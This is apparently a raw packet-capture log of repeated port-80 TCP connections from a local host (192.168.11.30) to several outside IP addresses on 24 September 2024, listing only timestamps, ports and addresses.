                                              Sep 24, 2024 11:28:41.112202883 CEST4992780192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:41.318276882 CEST804992785.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:41.318424940 CEST4992780192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:42.375538111 CEST4992780192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:43.394170046 CEST4992880192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:43.619213104 CEST804992885.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:43.619373083 CEST4992880192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:43.631062984 CEST4992880192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:43.631120920 CEST4992880192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:43.856602907 CEST804992885.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:43.874447107 CEST804992885.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:43.874461889 CEST804992885.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:43.874473095 CEST804992885.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:43.874659061 CEST4992880192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:44.078423023 CEST804992885.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:44.078588009 CEST4992880192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:45.140633106 CEST4992880192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:46.158615112 CEST4992980192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:46.391200066 CEST804992985.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:46.391360044 CEST4992980192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:46.398613930 CEST4992980192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:46.631635904 CEST804992985.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:46.674077988 CEST804992985.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:46.674089909 CEST804992985.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:46.674101114 CEST804992985.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:46.674360991 CEST4992980192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:46.677233934 CEST4992980192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:46.880871058 CEST804992985.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:46.881025076 CEST4992980192.168.11.3085.153.138.113
                                              Sep 24, 2024 11:28:46.909743071 CEST804992985.153.138.113192.168.11.30
                                              Sep 24, 2024 11:28:52.147315979 CEST4993080192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:52.349730968 CEST804993062.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:52.349939108 CEST4993080192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:52.359749079 CEST4993080192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:52.563117981 CEST804993062.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:52.563168049 CEST804993062.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:52.563249111 CEST804993062.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:52.563262939 CEST804993062.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:52.563272953 CEST804993062.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:52.563345909 CEST4993080192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:52.563488007 CEST4993080192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:53.872971058 CEST4993080192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:54.891566038 CEST4993180192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:55.094255924 CEST804993162.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:55.094551086 CEST4993180192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:55.105057955 CEST4993180192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:55.308546066 CEST804993162.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:55.308566093 CEST804993162.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:55.308593988 CEST804993162.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:55.308656931 CEST804993162.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:55.308684111 CEST804993162.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:55.308731079 CEST4993180192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:55.308902979 CEST4993180192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:56.606756926 CEST4993180192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:57.625207901 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:57.830080986 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:57.830347061 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:57.841571093 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:57.841588974 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:58.046561003 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.046574116 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047177076 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047204971 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047282934 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047295094 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047378063 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047431946 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:58.047473907 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:58.047672033 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:59.356118917 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:00.374317884 CEST4993380192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:00.581290007 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.581482887 CEST4993380192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:00.588927031 CEST4993380192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:00.796921968 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.797023058 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.797038078 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.797051907 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.797074080 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.797452927 CEST4993380192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:00.800730944 CEST4993380192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:01.007610083 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:05.928232908 CEST4993480192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:06.029992104 CEST80499343.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:06.030193090 CEST4993480192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:06.039757013 CEST4993480192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:06.141570091 CEST80499343.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:06.143263102 CEST80499343.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:06.143399954 CEST4993480192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:07.541749954 CEST4993480192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:07.643564939 CEST80499343.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:08.560262918 CEST4993580192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:08.662225962 CEST80499353.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:08.662482023 CEST4993580192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:08.673413038 CEST4993580192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:08.775228977 CEST80499353.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:08.777420044 CEST80499353.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:08.777550936 CEST4993580192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:10.181726933 CEST4993580192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:10.283967972 CEST80499353.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.200329065 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:11.302138090 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.302408934 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:11.312988043 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:11.313014984 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:11.415359974 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.415373087 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.415381908 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.415390968 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.416925907 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.417043924 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:12.821830988 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:12.923924923 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:13.840141058 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:14.852499008 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:14.954333067 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:14.954539061 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:14.967987061 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:15.069884062 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:15.073584080 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:15.073596001 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:15.073930979 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:15.080501080 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:15.081341982 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:15.081479073 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:15.182336092 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:20.322920084 CEST4993880192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:20.763868093 CEST8049938154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:20.764029980 CEST4993880192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:20.777054071 CEST4993880192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:21.217978954 CEST8049938154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:21.218245983 CEST8049938154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:21.218259096 CEST8049938154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:21.218451023 CEST4993880192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:22.288363934 CEST4993880192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:23.307447910 CEST4993980192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:23.621095896 CEST8049939154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:23.621268988 CEST4993980192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:23.632505894 CEST4993980192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:23.946290970 CEST8049939154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:23.946474075 CEST8049939154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:23.946486950 CEST8049939154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:23.946691036 CEST4993980192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:25.147043943 CEST4993980192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:26.166085005 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:26.597853899 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:26.598073959 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:26.611701012 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:26.611759901 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:27.043600082 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:27.043612957 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:27.043637037 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:27.043819904 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:27.043833017 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:27.043956041 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:28.115129948 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:29.134234905 CEST4994180192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:29.450326920 CEST8049941154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:29.450479984 CEST4994180192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:29.457438946 CEST4994180192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:29.773603916 CEST8049941154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:29.773740053 CEST8049941154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:29.773755074 CEST8049941154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:29.774051905 CEST4994180192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:29.776875973 CEST4994180192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:30.092967033 CEST8049941154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:35.166361094 CEST4994280192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:35.480775118 CEST8049942206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:35.481132984 CEST4994280192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:35.490955114 CEST4994280192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:35.805438995 CEST8049942206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:35.805591106 CEST8049942206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:35.806149006 CEST4994280192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:37.003770113 CEST4994280192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:38.022341013 CEST4994380192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:38.335192919 CEST8049943206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:38.335427999 CEST4994380192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:38.345809937 CEST4994380192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:38.658792019 CEST8049943206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:38.658900023 CEST8049943206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:38.659068108 CEST4994380192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:39.846920013 CEST4994380192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:40.865267038 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:41.180237055 CEST8049944206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:41.180406094 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:41.190337896 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:41.190356970 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:41.505285025 CEST8049944206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:41.505441904 CEST8049944206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:41.505600929 CEST8049944206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:41.505722046 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:42.705632925 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:43.723862886 CEST4994580192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:44.042311907 CEST8049945206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:44.042475939 CEST4994580192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:44.048887968 CEST4994580192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:44.367330074 CEST8049945206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:44.367574930 CEST8049945206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:44.367826939 CEST4994580192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:44.370646000 CEST4994580192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:44.688980103 CEST8049945206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:52.465756893 CEST4994680192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:29:52.599802971 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:52.600204945 CEST4994680192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:29:52.607949972 CEST4994680192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:29:52.747982979 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:53.083487988 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:53.083523989 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:53.083539009 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:53.083553076 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:53.083734989 CEST4994680192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:29:53.083997011 CEST4994680192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:29:53.089190006 CEST4994680192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:29:53.223253012 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:58.098874092 CEST4994780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:29:58.413238049 CEST8049947206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:29:58.413434029 CEST4994780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:29:58.423151016 CEST4994780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:29:58.737560034 CEST8049947206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:29:58.737744093 CEST8049947206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:29:58.737977028 CEST4994780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:29:59.936050892 CEST4994780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:00.954696894 CEST4994880192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:01.273042917 CEST8049948206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:01.273283005 CEST4994880192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:01.285279036 CEST4994880192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:01.603673935 CEST8049948206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:01.603801012 CEST8049948206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:01.603996038 CEST4994880192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:02.794764996 CEST4994880192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:03.813306093 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:04.130846977 CEST8049949206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:04.131043911 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:04.142028093 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:04.142046928 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:04.459712982 CEST8049949206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:04.459904909 CEST8049949206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:04.546061039 CEST8049949206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:04.546220064 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:05.653599977 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:06.671679974 CEST4995080192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:06.986915112 CEST8049950206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:06.987087965 CEST4995080192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:06.993084908 CEST4995080192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:07.308537006 CEST8049950206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:07.308634996 CEST8049950206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:07.308934927 CEST4995080192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:07.312051058 CEST4995080192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:07.627249002 CEST8049950206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:12.326884031 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.496589899 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.496731997 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.508598089 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.678319931 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689295053 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689409971 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689428091 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689439058 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689450979 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689541101 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689603090 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.689655066 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689676046 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689688921 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689699888 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689773083 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.689773083 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.689878941 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.689960957 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.690175056 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:14.010998011 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.029839039 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.196926117 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.197118044 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.208142042 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.375392914 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388524055 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388540030 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388638020 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388653994 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388725042 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.388760090 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388784885 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.388916016 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388931036 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388966084 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.389122009 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.389137983 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.389247894 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.389337063 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.389528990 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:16.713531971 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:17.731769085 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:17.900293112 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:17.900501966 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:17.909603119 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:17.909621954 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:18.077914953 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.077927113 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.078135967 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.089972973 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.090086937 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.090101957 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.090114117 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.090250015 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:18.090285063 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:18.090311050 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.090363026 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.090500116 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:18.090568066 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.090615034 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.090627909 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.090640068 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.090663910 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.090728998 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:18.090806007 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:19.416064978 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:20.434138060 CEST4995480192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:20.602221012 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.602385998 CEST4995480192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:20.609572887 CEST4995480192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:20.777451992 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.788508892 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.788628101 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.788645029 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.788662910 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.788675070 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.788686037 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.788892031 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.788981915 CEST4995480192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:20.789020061 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.789027929 CEST4995480192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:20.789041042 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.789052963 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.789158106 CEST4995480192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:20.789227009 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:20.789262056 CEST4995480192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:20.789378881 CEST4995480192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:20.793232918 CEST4995480192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:20.961417913 CEST8049954209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:25.808250904 CEST4995680192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:26.142539024 CEST804995613.76.137.44192.168.11.30
